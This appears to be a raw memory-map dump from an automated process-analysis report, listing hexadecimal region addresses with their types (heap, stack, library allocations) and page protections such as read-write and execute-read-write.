trusted library allocation
page read and write
2AFE000
stack
page read and write
4E9000
heap
page read and write
2AE8000
trusted library allocation
page read and write
3158000
trusted library allocation
page read and write
2CC0000
heap
page execute and read and write
3110000
trusted library section
page readonly
3056000
trusted library allocation
page read and write
57B0000
trusted library allocation
page read and write
2AE8000
trusted library allocation
page read and write
57A8000
trusted library allocation
page read and write
279E000
stack
page read and write
4D3000
heap
page read and write
2AC8000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
3197000
trusted library allocation
page read and write
55AD000
heap
page read and write
33A3000
trusted library allocation
page read and write
AD0000
heap
page read and write
374E000
trusted library allocation
page read and write
12E55000
trusted library allocation
page read and write
E7D000
stack
page read and write
3175000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
26B0000
trusted library allocation
page read and write
BA0000
heap
page read and write
5A3E000
heap
page read and write
8F2E000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
342B000
trusted library allocation
page read and write
2AD6000
trusted library allocation
page read and write
3901000
trusted library allocation
page read and write
5A31000
heap
page read and write
8F2E000
trusted library allocation
page read and write
366000
trusted library allocation
page read and write
EC000
stack
page read and write
33F6000
trusted library allocation
page read and write
2AE8000
trusted library allocation
page read and write
2FD0000
trusted library allocation
page read and write
3660000
trusted library allocation
page read and write
2460000
heap
page read and write
2AE0000
trusted library allocation
page read and write
10057000
unkown
page read and write
374E000
trusted library allocation
page read and write
4CF000
heap
page read and write
2AE8000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
3090000
unkown
page read and write
2FD0000
trusted library allocation
page read and write
1005A000
unkown
page readonly
57B0000
trusted library allocation
page read and write
2105000
heap
page read and write
2660000
heap
page read and write
1C60000
heap
page read and write
374F000
trusted library allocation
page read and write
3175000
trusted library allocation
page read and write
40A3000
heap
page read and write
33CF000
trusted library allocation
page read and write
118000
heap
page read and write
2A39000
trusted library allocation
page read and write
311000
stack
page read and write
600000
trusted library allocation
page read and write
53F000
heap
page read and write
3040000
trusted library allocation
page read and write
DA5000
trusted library allocation
page read and write
156000
heap
page read and write
47A000
heap
page read and write
855E000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
3140000
heap
page read and write
57B0000
trusted library allocation
page read and write
40DC000
heap
page read and write
10057000
unkown
page read and write
2AC1000
trusted library allocation
page read and write
5A6C000
heap
page read and write
37F8000
trusted library allocation
page read and write
38A5000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
38A5000
trusted library allocation
page read and write
33C6000
trusted library allocation
page read and write
57A8000
trusted library allocation
page read and write
31A0000
trusted library allocation
page read and write
2AD6000
trusted library allocation
page read and write
4E0000
heap
page read and write
3171000
trusted library allocation
page read and write
4088000
heap
page read and write
36F6000
trusted library allocation
page read and write
57B0000
trusted library allocation
page read and write
3DB0000
heap
page read and write
38B6000
trusted library allocation
page read and write
40FF000
heap
page read and write
155000
heap
page read and write
3BD9000
trusted library allocation
page read and write
57A8000
trusted library allocation
page read and write
40DC000
heap
page read and write
374E000
trusted library allocation
page read and write
E81E000
trusted library allocation
page read and write
40EC000
heap
page read and write
3175000
trusted library allocation
page read and write
2AA4000
trusted library allocation
page read and write
40F4000
heap
page read and write
1B67A000
heap
page read and write
87CE000
trusted library allocation
page read and write
600000
heap
page read and write
36C4000
trusted library allocation
page read and write
319E000
trusted library allocation
page read and write
38C0000
unkown
page readonly
374E000
trusted library allocation
page read and write
2F6E000
stack
page read and write
882E000
trusted library allocation
page read and write
3394000
trusted library allocation
page read and write
264000
heap
page read and write
33FF000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
E81E000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
342B000
trusted library allocation
page read and write
1E90000
heap
page execute and read and write
3666000
unkown
page read and write
342B000
trusted library allocation
page read and write
3B7B000
stack
page read and write
E81E000
trusted library allocation
page read and write
33A3000
trusted library allocation
page read and write
822E000
trusted library allocation
page read and write
4D8000
heap
page read and write
161000
heap
page read and write
57B0000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
2F8000
heap
page read and write
2B86000
trusted library allocation
page read and write
3953000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
10053000
unkown
page read and write
38C6000
trusted library allocation
page read and write
40CE000
heap
page read and write
1B1000
heap
page read and write
342B000
trusted library allocation
page read and write
40DC000
heap
page read and write
314D000
trusted library allocation
page read and write
33A3000
trusted library allocation
page read and write
3157000
trusted library allocation
page read and write
38B3000
trusted library allocation
page read and write
3BB3000
trusted library allocation
page read and write
2EA0000
trusted library allocation
page read and write
57B0000
trusted library allocation
page read and write
3650000
trusted library allocation
page read and write
3752000
trusted library allocation
page read and write
630000
heap
page read and write
57C3000
trusted library allocation
page read and write
1FD4000
trusted library allocation
page read and write
57A8000
trusted library allocation
page read and write
3412000
trusted library allocation
page read and write
2BD0000
trusted library allocation
page read and write
4D7000
heap
page read and write
33C7000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
33FF000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
E14000
heap
page read and write
755000
trusted library allocation
page read and write
5AD9000
heap
page read and write
38D0000
trusted library allocation
page read and write
87CE000
trusted library allocation
page read and write
2EEE000
stack
page read and write
2AD6000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
E81E000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
3FE000
stack
page read and write
2AEF000
trusted library allocation
page read and write
2900000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
40F1000
heap
page read and write
1AEB0000
trusted library allocation
page read and write
25AF000
stack
page read and write
40F8000
heap
page read and write
1B669000
heap
page read and write
2AE0000
trusted library allocation
page read and write
20000
heap
page read and write
2D0E000
stack
page read and write
5A3E000
heap
page read and write
3BD2000
trusted library allocation
page read and write
2E88000
trusted library allocation
page read and write
38B3000
trusted library allocation
page read and write
33B4000
trusted library allocation
page read and write
3143000
trusted library allocation
page read and write
3C11000
trusted library allocation
page read and write
32E7000
trusted library allocation
page read and write
5AB000
heap
page read and write
EA2000
heap
page read and write
2E40000
trusted library allocation
page read and write
450000
heap
page read and write
3157000
trusted library allocation
page read and write
12FC1000
trusted library allocation
page read and write
149000
heap
page read and write
2AEF000
trusted library allocation
page read and write
44D000
heap
page read and write
57A8000
trusted library allocation
page read and write
149000
heap
page read and write
8F9E000
trusted library allocation
page read and write
26F6000
trusted library allocation
page read and write
8F9E000
trusted library allocation
page read and write
3765000
trusted library allocation
page read and write
2AD6000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
28C4000
heap
page read and write
55AD000
heap
page read and write
387C000
stack
page read and write
40F6000
heap
page read and write
40F1000
heap
page read and write
3175000
trusted library allocation
page read and write
38E5000
trusted library allocation
page read and write
7FF000F5000
trusted library allocation
page read and write
38B3000
trusted library allocation
page read and write
2B10000
heap
page read and write
57B0000
trusted library allocation
page read and write
3175000
trusted library allocation
page read and write
3356000
trusted library allocation
page read and write
6E0000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
322C000
trusted library allocation
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
287D000
stack
page read and write
5A74000
heap
page read and write
340000
trusted library allocation
page read and write
2AA4000
trusted library allocation
page read and write
296000
trusted library allocation
page read and write
2AD6000
trusted library allocation
page read and write
770000
heap
page read and write
33CA000
trusted library allocation
page read and write
2B25000
trusted library allocation
page read and write
2DAE000
stack
page read and write
3768000
trusted library allocation
page read and write
30AA000
trusted library allocation
page read and write
1F0000
heap
page read and write
272F000
stack
page read and write
3900000
trusted library allocation
page read and write
33FF000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
38CA000
trusted library allocation
page read and write
1CCA0000
heap
page read and write
1E0000
heap
page read and write
315B000
trusted library allocation
page read and write
57B0000
trusted library allocation
page read and write
38CB000
trusted library allocation
page read and write
7FF00230000
trusted library allocation
page execute and read and write
2DA000
heap
page read and write
3396000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
311F000
trusted library section
page readonly
5A7B000
heap
page read and write
7FF0002A000
trusted library allocation
page execute and read and write
377E000
trusted library allocation
page read and write
310000
heap
page read and write
3157000
trusted library allocation
page read and write
12E51000
trusted library allocation
page read and write
2AC1000
trusted library allocation
page read and write
8F2E000
trusted library allocation
page read and write
376E000
trusted library allocation
page read and write
3123000
trusted library allocation
page read and write
338C000
trusted library allocation
page read and write
1C50000
heap
page read and write
26B0000
trusted library allocation
page read and write
2AD6000
trusted library allocation
page read and write
53F000
heap
page read and write
40F6000
heap
page read and write
342B000
trusted library allocation
page read and write
7FF001B0000
trusted library allocation
page read and write
38AF000
trusted library allocation
page read and write
50C000
heap
page read and write
5A8E000
heap
page read and write
342B000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
2C8A000
heap
page execute and read and write
2A36000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
1C96000
heap
page read and write
2AC8000
trusted library allocation
page read and write
3310000
heap
page read and write
57C3000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
363C000
stack
page read and write
88C0000
trusted library allocation
page read and write
2AA4000
trusted library allocation
page read and write
530000
heap
page read and write
27CE000
stack
page read and write
3BC8000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
677000
heap
page read and write
3143000
trusted library allocation
page read and write
3161000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
365000
trusted library allocation
page read and write
1C10000
trusted library allocation
page read and write
1B69A000
heap
page read and write
151000
heap
page read and write
2F5E000
stack
page read and write
57B0000
trusted library allocation
page read and write
8DFE000
trusted library allocation
page read and write
57A8000
trusted library allocation
page read and write
33BA000
trusted library allocation
page read and write
5594000
heap
page read and write
2AE0000
trusted library allocation
page read and write
25B0000
trusted library allocation
page read and write
E81E000
trusted library allocation
page read and write
342B000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
5A55000
heap
page read and write
10046000
unkown
page readonly
3060000
trusted library allocation
page read and write
2880000
trusted library allocation
page read and write
7FF001C0000
trusted library allocation
page execute and read and write
3166000
trusted library allocation
page read and write
33A3000
trusted library allocation
page read and write
484000
heap
page read and write
38D0000
trusted library allocation
page read and write
3C0B000
trusted library allocation
page read and write
28A5000
trusted library allocation
page read and write
2AC1000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
8D6E000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
31E9000
trusted library allocation
page read and write
31C9000
trusted library allocation
page read and write
38C2000
trusted library allocation
page read and write
40EC000
heap
page read and write
38B6000
trusted library allocation
page read and write
2AC8000
trusted library allocation
page read and write
13102000
trusted library allocation
page read and write
38AF000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
3157000
trusted library allocation
page read and write
33C6000
trusted library allocation
page read and write
26D0000
trusted library allocation
page read and write
296C000
stack
page read and write
57B4000
trusted library allocation
page read and write
C50000
heap
page read and write
38B3000
trusted library allocation
page read and write
38D0000
trusted library allocation
page read and write
31C2000
trusted library allocation
page read and write
40A0000
heap
page read and write
9DE000
stack
page read and write
5780000
trusted library allocation
page read and write
2AE8000
trusted library allocation
page read and write
38C4000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
1AC000
heap
page read and write
213B000
heap
page read and write
37E7000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
558A000
heap
page read and write
2AC8000
trusted library allocation
page read and write
40F6000
heap
page read and write
16C000
stack
page read and write
130A0000
trusted library allocation
page read and write
2B60000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
EA6000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
694000
heap
page read and write
10057000
unkown
page read and write
40DC000
heap
page read and write
31FC000
trusted library allocation
page read and write
31E6000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
1DA000
stack
page read and write
29AA000
trusted library allocation
page read and write
2AE8000
trusted library allocation
page read and write
40CE000
heap
page read and write
5A81000
heap
page read and write
625000
trusted library allocation
page read and write
2100000
heap
page read and write
2EAF000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
1AC000
heap
page read and write
2AE8000
trusted library allocation
page read and write
40DC000
heap
page read and write
57B0000
trusted library allocation
page read and write
2AC1000
trusted library allocation
page read and write
342B000
trusted library allocation
page read and write
2AC1000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
38AF000
trusted library allocation
page read and write
885E000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
3157000
trusted library allocation
page read and write
4095000
heap
page read and write
3413000
trusted library allocation
page read and write
4D5000
heap
page read and write
341B000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
1AC000
heap
page read and write
E3C000
stack
page read and write
374E000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
38B3000
trusted library allocation
page read and write
4E0000
heap
page read and write
2AE8000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
38D0000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
33A3000
trusted library allocation
page read and write
1FDA000
trusted library allocation
page read and write
26F5000
trusted library allocation
page read and write
40BF000
heap
page read and write
7FF00022000
trusted library allocation
page execute and read and write
405D000
heap
page read and write
40F4000
heap
page read and write
3119000
trusted library section
page readonly
23FE000
stack
page read and write
33C0000
trusted library allocation
page read and write
33C6000
trusted library allocation
page read and write
40DA000
heap
page read and write
2990000
heap
page read and write
2AE8000
trusted library allocation
page read and write
2926000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
2900000
trusted library allocation
page read and write
22B000
stack
page read and write
342B000
trusted library allocation
page read and write
3175000
trusted library allocation
page read and write
637000
heap
page read and write
34D0000
trusted library allocation
page execute
38AF000
trusted library allocation
page read and write
1D6000
stack
page read and write
33B9000
trusted library allocation
page read and write
38AF000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
DED000
stack
page read and write
2AEF000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
363D000
trusted library allocation
page read and write
760000
heap
page read and write
88C0000
trusted library allocation
page read and write
22ED000
trusted library allocation
page read and write
3758000
trusted library allocation
page read and write
38C9000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
2AC8000
trusted library allocation
page read and write
2AA4000
trusted library allocation
page read and write
5919000
heap
page read and write
33C6000
trusted library allocation
page read and write
4080000
heap
page read and write
2900000
trusted library allocation
page read and write
2925000
trusted library allocation
page read and write
57B0000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
38CE000
trusted library allocation
page read and write
6A8000
heap
page read and write
33FF000
trusted library allocation
page read and write
4078000
heap
page read and write
500000
heap
page read and write
2AD6000
trusted library allocation
page read and write
57A8000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
2A21000
trusted library allocation
page read and write
55B5000
heap
page read and write
3328000
trusted library allocation
page read and write
50C000
heap
page read and write
7FF00170000
trusted library allocation
page execute and read and write
407B000
heap
page read and write
2AE8000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
2450000
heap
page read and write
10000
heap
page read and write
122000
heap
page read and write
3159000
trusted library allocation
page read and write
3157000
trusted library allocation
page read and write
5A61000
heap
page read and write
2B26000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
27D000
heap
page read and write
2A8D000
stack
page read and write
40FA000
heap
page read and write
33B3000
trusted library allocation
page read and write
4D5000
heap
page read and write
407C000
heap
page read and write
33A1000
trusted library allocation
page read and write
5AEE000
heap
page read and write
2AE0000
trusted library allocation
page read and write
38B3000
trusted library allocation
page read and write
342B000
trusted library allocation
page read and write
E81E000
trusted library allocation
page read and write
33B2000
trusted library allocation
page read and write
2E90000
trusted library allocation
page read and write
3100000
heap
page read and write
57B0000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
E81E000
trusted library allocation
page read and write
40F8000
heap
page read and write
730000
trusted library allocation
page read and write
2DA5000
stack
page read and write
57AB000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
2B0000
heap
page read and write
2786000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
33A1000
trusted library allocation
page read and write
38B6000
trusted library allocation
page read and write
E81E000
trusted library allocation
page read and write
1BBD0000
heap
page read and write
57C3000
trusted library allocation
page read and write
3149000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
40FD000
heap
page read and write
524F000
stack
page read and write
55E4000
heap
page read and write
2CF0000
trusted library allocation
page read and write
33A3000
trusted library allocation
page read and write
2F6E000
stack
page read and write
3720000
heap
page read and write
38B6000
trusted library allocation
page read and write
1BDBE000
stack
page read and write
2AC8000
trusted library allocation
page read and write
13B000
heap
page read and write
57AB000
trusted library allocation
page read and write
57B0000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
3040000
trusted library allocation
page read and write
2870000
trusted library allocation
page read and write
10046000
unkown
page readonly
4E4000
heap
page read and write
57C3000
trusted library allocation
page read and write
4079000
heap
page read and write
480000
heap
page read and write
A0000
heap
page read and write
2AD6000
trusted library allocation
page read and write
48E000
heap
page read and write
2AD6000
trusted library allocation
page read and write
2E11000
heap
page read and write
30E1000
trusted library allocation
page read and write
20000
heap
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
DA6000
trusted library allocation
page read and write
9E0000
heap
page read and write
57A8000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
5580000
heap
page read and write
342B000
trusted library allocation
page read and write
57A8000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
2C0000
heap
page read and write
2F2F000
stack
page read and write
8C4E000
trusted library allocation
page read and write
2E40000
trusted library allocation
page read and write
10000000
unkown
page readonly
57AB000
trusted library allocation
page read and write
2AC8000
trusted library allocation
page read and write
C46000
trusted library allocation
page read and write
33FF000
trusted library allocation
page read and write
2A1C000
stack
page read and write
2AC8000
trusted library allocation
page read and write
33C4000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
E81E000
trusted library allocation
page read and write
29D0000
remote allocation
page read and write
33A1000
trusted library allocation
page read and write
2EB5000
trusted library allocation
page read and write
2500000
trusted library allocation
page read and write
30A0000
trusted library allocation
page read and write
38D0000
trusted library allocation
page read and write
4560000
heap
page read and write
88C0000
trusted library allocation
page read and write
2EB6000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
2AE8000
trusted library allocation
page read and write
38D0000
trusted library allocation
page read and write
31CD000
trusted library allocation
page read and write
28E2000
heap
page read and write
C45000
trusted library allocation
page read and write
154000
heap
page read and write
3610000
unkown
page read and write
374E000
trusted library allocation
page read and write
2AE8000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
E81E000
trusted library allocation
page read and write
4073000
heap
page read and write
373C000
trusted library allocation
page read and write
57B0000
trusted library allocation
page read and write
33D0000
trusted library allocation
page read and write
38B6000
trusted library allocation
page read and write
E81E000
trusted library allocation
page read and write
3157000
trusted library allocation
page read and write
1CA40000
heap
page read and write
668000
heap
page read and write
10046000
unkown
page readonly
2AA4000
trusted library allocation
page read and write
2AE8000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
3157000
trusted library allocation
page read and write
2994000
heap
page read and write
38B3000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
3040000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
2E66000
trusted library allocation
page read and write
6AD000
heap
page read and write
3175000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
33A3000
trusted library allocation
page read and write
314E000
trusted library allocation
page read and write
7FF00280000
trusted library allocation
page execute and read and write
4D8000
heap
page read and write
315A000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
38D0000
trusted library allocation
page read and write
28C0000
heap
page read and write
2B5000
trusted library allocation
page read and write
7FF0025D000
trusted library allocation
page execute and read and write
3396000
trusted library allocation
page read and write
38C7000
trusted library allocation
page read and write
3900000
trusted library allocation
page read and write
38B6000
trusted library allocation
page read and write
885E000
trusted library allocation
page read and write
38C0000
trusted library allocation
page read and write
4D5000
heap
page read and write
40A3000
heap
page read and write
1CF000
heap
page read and write
38D0000
trusted library allocation
page read and write
2B00000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
342B000
trusted library allocation
page read and write
3157000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
33B0000
trusted library allocation
page read and write
315F000
trusted library allocation
page read and write
28CF000
stack
page read and write
2E66000
trusted library allocation
page read and write
3146000
trusted library allocation
page read and write
3A5B000
stack
page read and write
7FF001F0000
trusted library allocation
page read and write
38B6000
trusted library allocation
page read and write
38B3000
trusted library allocation
page read and write
33A1000
trusted library allocation
page read and write
3389000
trusted library allocation
page read and write
405D000
heap
page read and write
33FF000
trusted library allocation
page read and write
409E000
heap
page read and write
374E000
trusted library allocation
page read and write
10000
heap
page read and write
33CE000
trusted library allocation
page read and write
10000000
unkown
page readonly
7FF00220000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
33A1000
trusted library allocation
page read and write
342B000
trusted library allocation
page read and write
342B000
trusted library allocation
page read and write
3510000
trusted library allocation
page read and write
EA5000
trusted library allocation
page read and write
33A1000
trusted library allocation
page read and write
D0000
heap
page read and write
2AE0000
trusted library allocation
page read and write
2AE8000
trusted library allocation
page read and write
5A53000
heap
page read and write
D4E000
stack
page read and write
342B000
trusted library allocation
page read and write
313D000
trusted library allocation
page read and write
E81E000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
314D000
trusted library allocation
page read and write
3140000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
4BC000
heap
page read and write
2AE0000
trusted library allocation
page read and write
2AD6000
trusted library allocation
page read and write
8DFE000
trusted library allocation
page read and write
2C7000
heap
page read and write
342B000
trusted library allocation
page read and write
57A8000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
57C3000
trusted library allocation
page read and write
3030000
trusted library allocation
page read and write
40DC000
heap
page read and write
4010000
heap
page read and write
3175000
trusted library allocation
page read and write
E81E000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
273F000
stack
page read and write
40DC000
heap
page read and write
277000
heap
page read and write
31A0000
trusted library allocation
page read and write
1F0000
trusted library allocation
page read and write
3165000
trusted library allocation
page read and write
33A1000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
2AEF000
trusted library allocation
page read and write
1C9BD000
stack
page read and write
374E000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
2AC8000
trusted library allocation
page read and write
303000
heap
page read and write
40EC000
heap
page read and write
374E000
trusted library allocation
page read and write
3BE3000
trusted library allocation
page read and write
3417000
trusted library allocation
page read and write
3411000
trusted library allocation
page read and write
2EA0000
trusted library allocation
page read and write
2A90000
heap
page read and write
3396000
trusted library allocation
page read and write
10053000
unkown
page read and write
C8D000
stack
page read and write
57B0000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
2A72000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
38B3000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
5915000
heap
page read and write
40F6000
heap
page read and write
2FCE000
stack
page read and write
5A55000
heap
page read and write
57B4000
trusted library allocation
page read and write
69A000
heap
page read and write
57B0000
trusted library allocation
page read and write
626000
trusted library allocation
page read and write
8D5000
trusted library allocation
page read and write
315D000
trusted library allocation
page read and write
30D6000
trusted library allocation
page read and write
360E000
stack
page read and write
33A1000
trusted library allocation
page read and write
38B3000
trusted library allocation
page read and write
1005A000
unkown
page readonly
2AC8000
trusted library allocation
page read and write
33C6000
trusted library allocation
page read and write
2826000
trusted library allocation
page read and write
40D6000
heap
page read and write
57A8000
trusted library allocation
page read and write
CE0000
heap
page read and write
57B4000
trusted library allocation
page read and write
2EE0000
trusted library allocation
page read and write
2AC1000
trusted library allocation
page read and write
247000
heap
page read and write
40F4000
heap
page read and write
2AE8000
trusted library allocation
page read and write
4BC000
heap
page read and write
3459000
heap
page read and write
37FC000
trusted library allocation
page read and write
38A5000
trusted library allocation
page read and write
90FE000
trusted library allocation
page read and write
8D6000
trusted library allocation
page read and write
670000
heap
page read and write
2C0000
heap
page read and write
30BC000
trusted library allocation
page read and write
33A1000
trusted library allocation
page read and write
830000
heap
page read and write
2460000
trusted library allocation
page read and write
38B3000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
4080000
heap
page read and write
2AE8000
trusted library allocation
page read and write
3419000
trusted library allocation
page read and write
90FE000
trusted library allocation
page read and write
3145000
trusted library allocation
page read and write
2785000
trusted library allocation
page read and write
66D000
heap
page read and write
2314000
trusted library allocation
page read and write
C20000
trusted library allocation
page read and write
1FD0000
trusted library allocation
page read and write
32A000
heap
page read and write
26C000
stack
page read and write
885E000
trusted library allocation
page read and write
40CE000
heap
page read and write
33A1000
trusted library allocation
page read and write
40CE000
heap
page read and write
14B000
heap
page read and write
33CB000
trusted library allocation
page read and write
33C9000
trusted library allocation
page read and write
348F000
heap
page read and write
2AC8000
trusted library allocation
page read and write
33FF000
trusted library allocation
page read and write
2A94000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
460000
trusted library allocation
page read and write
3157000
trusted library allocation
page read and write
2EAE000
stack
page read and write
2AA4000
trusted library allocation
page read and write
3181000
trusted library allocation
page read and write
33A1000
trusted library allocation
page read and write
31A0000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
2E00000
heap
page read and write
407B000
heap
page read and write
38B6000
trusted library allocation
page read and write
38D0000
trusted library allocation
page read and write
55C9000
heap
page read and write
3097000
trusted library allocation
page read and write
3418000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
374E000
trusted library allocation
page read and write
3175000
trusted library allocation
page read and write
31A0000
trusted library allocation
page read and write
7FF000E2000
trusted library allocation
page execute and read and write
3175000
trusted library allocation
page read and write
3415000
trusted library allocation
page read and write
2AD6000
trusted library allocation
page read and write
342F000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
3149000
trusted library allocation
page read and write
28D0000
trusted library allocation
page read and write
2E85000
trusted library allocation
page read and write
8B0000
trusted library allocation
page read and write
7FF002A0000
trusted library allocation
page execute and read and write
374E000
trusted library allocation
page read and write
38C3000
trusted library allocation
page read and write
2AC8000
trusted library allocation
page read and write
2B0000
trusted library allocation
page read and write
38AF000
trusted library allocation
page read and write
38B3000
trusted library allocation
page read and write
2AC1000
trusted library allocation
page read and write
40F1000
heap
page read and write
38D0000
trusted library allocation
page read and write
3151000
trusted library allocation
page read and write
495000
heap
page read and write
3900000
trusted library allocation
page read and write
4D8000
heap
page read and write
2AE8000
trusted library allocation
page read and write
53B000
heap
page read and write
2AC1000
trusted library allocation
page read and write
2DCE000
stack
page read and write
33C6000
trusted library allocation
page read and write
1005A000
unkown
page readonly
57B4000
trusted library allocation
page read and write
2AE8000
trusted library allocation
page read and write
22FF000
trusted library allocation
page read and write
33FF000
trusted library allocation
page read and write
7FF00200000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
40AF000
heap
page read and write
28D0000
trusted library allocation
page read and write
4CF000
heap
page read and write
57D000
heap
page read and write
E80000
heap
page read and write
33B8000
trusted library allocation
page read and write
57B0000
trusted library allocation
page read and write
39AA000
trusted library allocation
page read and write
2E36000
trusted library allocation
page read and write
2AC8000
trusted library allocation
page read and write
57AB000
trusted library allocation
page read and write
2E51000
trusted library allocation
page read and write
33C1000
trusted library allocation
page read and write
342B000
trusted library allocation
page read and write
290000
trusted library allocation
page read and write
1B6BF000
heap
page read and write
314D000
trusted library allocation
page read and write
10053000
unkown
page read and write
38A000
heap
page read and write
240000
heap
page read and write
3416000
trusted library allocation
page read and write
40F8000
heap
page read and write
8F9E000
trusted library allocation
page read and write
57A8000
trusted library allocation
page read and write
2760000
trusted library allocation
page read and write
4E3000
heap
page read and write
38B6000
trusted library allocation
page read and write
340000
heap
page read and write
57A8000
trusted library allocation
page read and write
2A94000
trusted library allocation
page read and write
2D16000
trusted library allocation
page read and write
90FE000
trusted library allocation
page read and write
2AE8000
trusted library allocation
page read and write
1F8000
heap
page read and write
2AE8000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
4CF000
heap
page read and write
90FE000
trusted library allocation
page read and write
7FF000FA000
trusted library allocation
page execute and read and write
38E0000
trusted library allocation
page read and write
342D000
trusted library allocation
page read and write
33B6000
trusted library allocation
page read and write
309A000
trusted library allocation
page read and write
2AC1000
trusted library allocation
page read and write
10000000
unkown
page readonly
5A53000
heap
page read and write
57C3000
trusted library allocation
page read and write
2430000
heap
page read and write
4F1000
heap
page read and write
28D0000
trusted library allocation
page read and write
40BF000
heap
page read and write
2800000
trusted library allocation
page read and write
376B000
trusted library allocation
page read and write
12F61000
trusted library allocation
page read and write
10057000
unkown
page read and write
57B4000
trusted library allocation
page read and write
547000
heap
page read and write
2AD6000
trusted library allocation
page read and write
33FF000
trusted library allocation
page read and write
336F000
trusted library allocation
page read and write
855E000
trusted library allocation
page read and write
38C1000
trusted library allocation
page read and write
885E000
trusted library allocation
page read and write
4E3000
heap
page read and write
38B6000
trusted library allocation
page read and write
882E000
trusted library allocation
page read and write
855000
trusted library allocation
page read and write
860E000
trusted library allocation
page read and write
90FE000
trusted library allocation
page read and write
88C0000
trusted library allocation
page read and write
33A3000
trusted library allocation
page read and write
342B000
trusted library allocation
page read and write
34D3000
trusted library allocation
page execute
2F05000
trusted library allocation
page read and write
1BECE000
stack
